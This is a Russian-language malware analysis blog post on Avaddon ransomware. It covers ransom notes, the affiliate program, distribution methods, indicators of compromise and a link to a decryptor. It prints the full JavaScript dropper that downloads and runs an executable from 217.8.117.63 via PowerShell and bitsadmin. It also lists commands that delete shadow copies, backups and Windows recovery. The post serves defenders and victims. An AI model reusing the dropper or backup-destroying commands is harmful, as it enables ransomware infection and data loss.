Avaddon Ransomware
Avaddon Doxware
Avaddon DDoS-attack-Ransomware
(шифровальщик-вымогатель, RaaS, публикатор) (первоисточник)
Translation into English
Этот крипто-вымогатель шифрует данные пользователей с помощью AES-256 + RSA-2048, а затем требует выкуп от $150 до $350 и более в BTC, чтобы вернуть файлы. Оригинальное название: Avaddon Ransomware. Написано на С++ c использованием WinAPI. Предназначен для ОС Windows 7-10.
Вымогатели, распространяющие Avaddon, угрожают опубликовать украденные данные с целью усиления давления на жертву (отсюда дополнительное название — публикатор). Как известно из других Ransomware, для этого операторы-вымогатели начинают кражу данных ещё перед шифрованием файлов. О подобных акциях вымогателей сообщалось в СМИ. На момент публикации статьи в июне 2020, вымогатели, стоящие за Avaddon, еще не публиковали данные своих жертв и только в августе 2020 они создали сайт утечек для публикации украденных данных.
Обнаружения для JS-файла:
ALYac -> Trojan.Downloader.Script.gen
Avast/AVG -> JS:Downloader-FYY [Trj]
BitDefender -> Exploit.HTML.BitsAdmin.Gen
DrWeb -> Trojan.Siggen9.51827
ESET-NOD32 -> PowerShell/TrojanDownloader.Agent.DV
GData -> Heur.BZC.UGZ.Leopard.1.1A3CBDA3
Kaspersky -> HEUR:Trojan-Downloader.Script.Generic
Microsoft -> TrojanDownloader:PowerShell/Ploprolo.A
Qihoo-360 -> Virus.js.qexvmc.1
Rising -> Trojan.Downloader!1.A527 (CLASSIC)
Symantec -> Downloader
Tencent -> Heur:Trojan.Powershell.Downloader.a
TrendMicro -> Troj_Gen.F04IE00F420
© Генеалогия: ??? >> Avaddon
Этимология названия:
Аваддон — Ангел Бездны, повелевающий легионами саранчи. "Аваддон" в переводе с еврейского означает "место гибели" или "глубины ада". Упоминается в разных литературных произведениях.
К зашифрованным файлам добавляется расширение: .avdn
Внимание! Новые расширения, email и тексты о выкупе можно найти в конце статьи, в обновлениях. Там могут быть различия с первоначальным вариантом.
Распространение этого крипто-вымогателя началось в начале июня 2020 г. Впервые "Avaddon Ransomware" был представлен на одном из хакерских форумов, который нам известен, но не хочется его "рекламировать" лишний раз. Да и сами вымогатели кажутся мне знакомыми, хотя они и "пишут" свои "творения" каждый раз с "нуля", стиль и другие элементы их "творчества" легко угадываются.
Этот "Avaddon Ransomware" ориентирован на пользователей нескольких языков, что способствует наибольшему распространению по всему миру. Судя по onion-сайту вымогателей, это будут следующие языки: английский, немецкий, испанский, французский, итальянский, португальский, китайский, японский, корейский.
Записка с требованием выкупа называется по хорошо известно шаблону: <number>-readme.html
Примеры таких записок:
607416-readme.html
857334-readme.html
Содержание записки о выкупе:
Your network has been infected by Avaddon
All your documents, photos, databases and other important files have been encrypted and you are not able to decrypt it by yourself. But don't worry, we can help you to restore all your files!
The only way to restore your files is to buy our special software - Avaddon General Decryptor. Only we can give you this software and only we can restore your files!
You can get more information on our page, which is located in a Tor hidden network.
How to get to our page
Download Tor browser - https://www.torproject.org/
Install Tor browser
Open link in Tor browser - avaddonbotrxmuyl.onion
Follow the instructions on this page
Your ID:
NDctTkFiSm8ycFVVdGxRV3ZhVVl6Rmt0V3NEY*** [всего 1916 знаков]
DO NOT TRY TO RECOVER FILES YOURSELF!
DO NOT MODIFY ENCRYPTED FILES!
OTHERWISE, YOU MAY LOSE ALL YOUR FILES FOREVER!
Перевод записки на русский язык:
Ваша сеть была заражена Avaddon
Все ваши документы, фото, базы данных и другие важные файлы зашифрованы, и вы не можете расшифровать их сами. Но не волнуйтесь, мы можем помочь вам восстановить все ваши файлы!
Единственный способ восстановить ваши файлы - это купить нашу специальную программу - Avaddon General Decryptor. Только мы можем дать вам эту программу, и только мы можем восстановить ваши файлы!
Вы можете получить больше информации на нашей странице, которая находится в скрытой сети Tor.
Как попасть на нашу страницу
Скачать браузер Tor - https://www.torproject.org/
Установить браузер Tor
Открыть ссылку в браузере Tor - avaddonbotrxmuyl.onion
Следуйте инструкциям на этой странице
Ваш ID:
NDctTkFiSm8ycFVVdGxRV3ZhVVl6Rmt0V3NEY*** [всего 1916 знаков]
НЕ ПЫТАЙТЕСЬ ВОССТАНОВИТЬ ФАЙЛЫ!
НЕ ИЗМЕНЯЙТЕ ЗАШИФРОВАННЫЕ ФАЙЛЫ!
Иначе, вы можете потерять все свои файлы навсегда!
Заменяет обои на Рабочем столе на пиксельное изображение с текстом, призывающем прочитать инструкцию.
All your files has been encrypted
Instruction 607416-readme.html
Основным информатором жертвы, кроме записки с требованием выкупа, является сайт вымогателей, где имеется страница с таймером с QR-кодом для оплаты.
Здесь можно видеть, что дополнительные разъяснения иллюстрированы картинками персонажей из Гарри Поттера: Сириус Блэк, Альбус Дамблдор, Рубеус Хагрид. Двое из них представлены в чате в диалоге пострадавшего и представителя т.н. поддержки.
Официальное описание возможностей вымогателя для партнёров (на английском и русском языках):
Может распространяться путём взлома через незащищенную конфигурацию RDP, с помощью email-спама (тема письма "Your new photo?" или "Do you like my photo?") и вредоносных вложений (например, Image.jpg.js.zip, Document.docm, Document.xlsm), обманных загрузок, ботнетов (Phorphiex/Trik), эксплойтов, вредоносной рекламы, веб-инжектов, фальшивых обновлений, перепакованных и заражённых инсталляторов. См. также "Основные способы распространения криптовымогателей" на вводной странице блога.
Нужно всегда использовать Актуальную антивирусную защиту!!!
Если вы пренебрегаете комплексной антивирусной защитой класса Internet Security или Total Security, то хотя бы делайте резервное копирование важных файлов по методу 3-2-1.
➤ Может использовать схему атаки "матрёшка": zip > js > exe
Это может быть максимально эффективно при распространении email-спама с вредоносным вложением или с помощью загрузок на различных сайтах.
➤ Перед шифрованием с помощью сайта api.myip.com проверяет IP и страну пользователя ПК, и не шифрует файлы пользователей из стран бывшего СССР. Для некоторых стран установлена минимальная сумма платежа.
➤ Перед шифрованием очищает корзину, удаляет теневые копии файлов, манипулирует размером теневого хранилища, отключает функции восстановления и исправления Windows на этапе загрузки командами:
wmic.exe SHADOWCOPY /nointeractive
wbadmin DELETE SYSTEMSTATEBACKUP
wbadmin DELETE SYSTEMSTATEBACKUP -deleteOldest
bcdedit.exe /set {default} recoveryenabled No
bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures
vssadmin.exe Delete Shadows /All /Quiet
C:\Windows\system32\vssvc.exe
➤ Для атаки используется бесфайловая версия PowerShell и JavaScript-файл. Обходит UAC, повышает права до администратора. Для шифрования не требуется соединение с Интернет.
➤ Завершает процессы, останавливает и удаляет ряд служб, которые могут помещать шифрованию файлов. Проверяет все логические диски от "A" до "Z", ищет скрытые и монтирует их. Изменяет атрибуты файлов для получения к ним полного доступа.
➤ Шифрование файлов выполняется в многопоточном режиме на всех дисках (жёстких, съёмных, сетевых и прочих). Под каждый носитель создаётся отдельный поток. При подключении новых накопителей начинает их отрабатывать в отдельных потоках. Все новые файлы тоже будут зашифрованы.
➤ Размер выкупа нефиксированный и может меняться по желанию вымогателей.
➤ RaaS-программа участия
В рамках предоставления Avaddon Ransomware как RaaS филиалы, которые присоединяются к программе, несут ответственность за распространение Ransomware с помощью спама, взлома сетей и наборов эксплойтов.
В рамках этой договоренности Avaddon выплачивает филиалам 65% от всех выкупных платежей, которые они вносят, а операторы Avaddon получат 35%. Крупные филиалы обычно могут договориться о более высокой доле дохода в зависимости от размера их атак.
В Avaddon есть ряд правил, которым должны следовать филиалы при распространении Ransomware.
Запрещено распространять это для жертв, проживающих в странах СНГ (AZ, AM, BY, KZ, KG, MD, RU, TJ, UZ, UA, GE, TM).
Запрещено указывать или передавать третьим лицам адрес админ-панели в сети .onion.
Запрещено загружать .exe в непроверенные сканеры, которые объединяют AV-лаборатории.
Список файловых расширений, подвергающихся шифрованию:
Это документы MS Office, OpenOffice, PDF, текстовые файлы, базы данных, фотографии, музыка, видео, файлы образов, архивы и пр.
Файлы, связанные с этим Ransomware:
sava.exe - файл, загружаемый с URL-адреса
IMG162100.jpg.js.zip - архив с вредоносным скриптом
IMG162100.jpg.js - файл скрипта, замаскированный под файл изображения
update.job
<id>-readme.html - название файла с требованием выкупа
607416-readme.html - пример файла-записки
857334-readme.html - пример файла-записки
README.txt (README.txt.avdn)
5203508738.exe - случайное название вредоносного файла
bckgrd.bmp - изображение на обои (в некоторых вариантах)
Содержание файла IMG162100.jpg.js:
var jsRun=new ActiveXObject('WSCRIPT.Shell');
jsRun.Run("cmd.exe /c PowerShell -ExecutionPolicy Bypass (New-Object System.Net.WebClient).DownloadFile('http://217.8.117.63/sava.exe','%temp%\\5203508738.exe');Start-Process '%temp%\\5203508738.exe'",false);
jsRun.Run("cmd.exe /c bitsadmin /transfer getitman /download /priority high http://217.8.117.63/sava.exe %temp%\\237502353.exe&start %temp%\\237502353.exe", false);
Расположения:
\Desktop\ ->
\User_folders\ ->
\%TEMP%\ ->
C:\Users\User\Desktop\sava.exe
C:\Windows\Tasks\update.job
C:\Users\User\AppData\Roaming\5203508738.exe
Записи реестра, связанные с этим Ransomware:
См. ниже результаты анализов.
Мьютексы:
{2A0E9C7B-6BE8-4306-9F73-1057003F605B}
См. ниже результаты анализов.
Сетевые подключения и связи:
Malware-URL: xxxx://217.8.117.63/sava.exe
Tor-URL: avaddonbotrxmuyl.onion
Email: -
BTC: 3Pg4atmvjJTE8nqFqzQ5Pug1SCtyKSuviy
См. ниже в обновлениях другие адреса и контакты.
См. ниже результаты анализов.
Результаты анализов:
Ⓗ Hybrid analysis >>
𝚺 VirusTotal analysis (js) >> VT>
𝚺 VirusTotal analysis (exe) >>
🐞 Intezer analysis (js) >>
🐞 Intezer analysis (exe) >>
ᕒ ANY.RUN analysis >> AR>
ⴵ VMRay analysis >>
Ⓥ VirusBay samples >>
⨇ MalShare samples >>
👽 AlienVault analysis >>
🔃 CAPE Sandbox analysis >>
⟲ JOE Sandbox analysis >>
Степень распространённости: средняя.
Подробные сведения собираются регулярно. Присылайте образцы.
=== ИСТОРИЯ СЕМЕЙСТВА === HISTORY OF FAMILY ===
Обновление от 5 июня 2020:
Скриншоты от исследователя GrujaRS:
Обновление от 21 июня 2020:
Сообщение >>
Сообщение о том, что после уплаты выкупа дешифровка не предоставляется.
Открывается пустая страница с ошибкой 404. Обратного контакта также нет.
Вывод: Уплата выкупа бесполезна!
Другие пользователи сообщают, что у них страница с дешифратором открылась и они скачали дешифратор и смогли что-то расшифровать.
Обновление от 21 июня 2020:
Сообщение >>
Сообщение >>
Вредоносные файлы:
xxxx://217.8.117.63/wtava.exe - Результаты анализов: VT + HA + AR + IA + TG
hxxp://217.8.117.63/tspm.exe
hxxp://217.8.117.63/tava.exe
hxxp://217.8.117.63/tspm.exe
Результаты анализа на файл pic106101.jpg.js: VT + VMR + IA
Варианты от 22-26 июня 2020:
Сообщение >>
VT MD5:
202e85e1b55e938f6746948c198dc750
21f7d9ccdacbbf96b2f828eae253ce6a
22329b5d5965774f5bdf724b7e7bfd33
4209729d14757eb88e2a56e5ed69a861
4e01c64bd94357269a3e113a314b4808
676b86c857092108ced93193ec12d8be
6d10fd9f0e6abb0aeded5ee942567c9e
7b68af3d5b02e4ce98a8a514d2755488
7de6507e130224ede54fcbbca02ce900
83475ef7fff5cef303891cd4108437f0
a77dc8495173ed2c761ab020f2702827
b6683e30b669a37a2daddd9f2acb2ac0
c4ad6af850fc30f1a1c54b36c2ecadc4
ced6d4be84717d13b7b00ea57fcac2bb
Вариант от 28 июня 2020:
Сообщение >>
Файл проекта: ***\crypt\tmp_1562674328\bin\vafica.pdb
Результаты анализов: VT + VMR + IA
Вариант от 29 июня 2020:
Результаты анализов: VT + IA
Варианты от 30 июня 2020:
Сообщение >>
Сообщение >>
Расширения теперь случайные (random): .e5W7fivNP, .JGHh4eBP8Fd1I
Записка (шаблон): <random>_readme.html
Результаты анализов: VT + VMR + AR + IA / VT + IA + AR
Обновление от 3 июля 2020:
Сообщение >>
Теперь используются вредоносные документ XLS с макросами, которые после включения загружают Avaddon Ransomware.
Вариант от 6 июля 2020:
Сумма выкупа: 1495 USD / 0.16952182 BTC
BTC: 335BkP3nZMTNhMNe85rTM7FQjvV8Xuy1FV
Сайт: OZdvQ5.z64nuzgptrb4ujf5.onion/?m9
Записка: sY_readme.html
➤ Содержание записки:
Your network has been infected!
Your files are locked due to a vulnerability in your system!
You will not be able to decrypt the files yourself, in the worst case you can destroy the data irreversibly.
The only way to unlock your data is to buy the decryption program.
Go to the link written below to more details.
If you do not pay for recovery, then all the confidential data from your computer WILL BE TRANSFERRED TO PUBLIC ACCESS!
Follow the instructions below to restore your files and keep them confidential.
If you cannot do this yourself, find a data recovery company in internet.
They cannot help you unlock your data, because only we have decryption key, but will help you make a payment and provide you guarantees.
ATTENTION! DATA RECOVERY AGENCIES WORK AND DURING THE CORONOVIRUS QUARANTINE, THEY WILL HELP YOU REMOTE.
Also, I ask you to note, you have no long time, if you do not make payment soon, the price for the decryptor will double. So I recommend you dont waste time and move!
How to get to our page
• Download Tor browser from the official site
• Install Tor browser
• Open link in Tor browser - OZdvQ5.z64nuzgptrb4ujf5.onion/?m9
• Follow the instructions on this page
Your ID:
MjY1LS82ZUZHV1dGZGFMMCswZy9SMW1kZFRYQWlUaXZXR1dFaU [всего 2284 знаков]
Do not try to recover files yourself!
Do not modify encrypted files!
Otherwise, you may lose all your files forever!
hiscrm3hT5Yg1xZTDDh0bDzCqN50S
Обновление от 10 августа 2020:
Вымогатели, стоящие за Avaddon, создали сайт для публикации украденных данных. Статья об этом >>
Обновление от 2 сентября 2020:
Сообщение >>
Обновление от 3 сентября 2020:
Сообщение >>
Вариант от 8 сентября 2020:
Расширение: .CaEdDadCcE
В расширении чередуются английские буквы от A до E в разном регистре.
Сайт: avaddonbotrxmuyl.onion
BTC: 35nC4aE67j1PisdhYxKfYtNfDWu1kqz6V2
Сумма выкупа: $2000 (~0.202 BTC)
Обновление от 25 сентября 2020:
Read to links: Tweet on Twitter + Tw + Tw + Tw + Tw + myTweet ID Ransomware (ID as Avaddon) Write-up, Topic of Support Добавление от 8 июня 2020: статья на сайте BC >>
Внимание! Для зашифрованных файлов есть дешифровщик Скачать Emsisoft Decrypter для дешифровки >> Прочтите подробную инструкцию перед запуском.
Thanks: Shadow Intelligence, CryptoInsane, GrujaRS, Michael Gillespie Andrew Ivanov (author) AnyRun, BleepingComputer to the victims who sent the samples
© Amigo-A (Andrew Ivanov): All blog articles. Contact.
Вариация 2021 года у меня лежала тут:
ОтветитьУдалитьC:/Windows/System32/config/systemprofile/exe_conor16.exe
Спасибо, добавили.
Удалить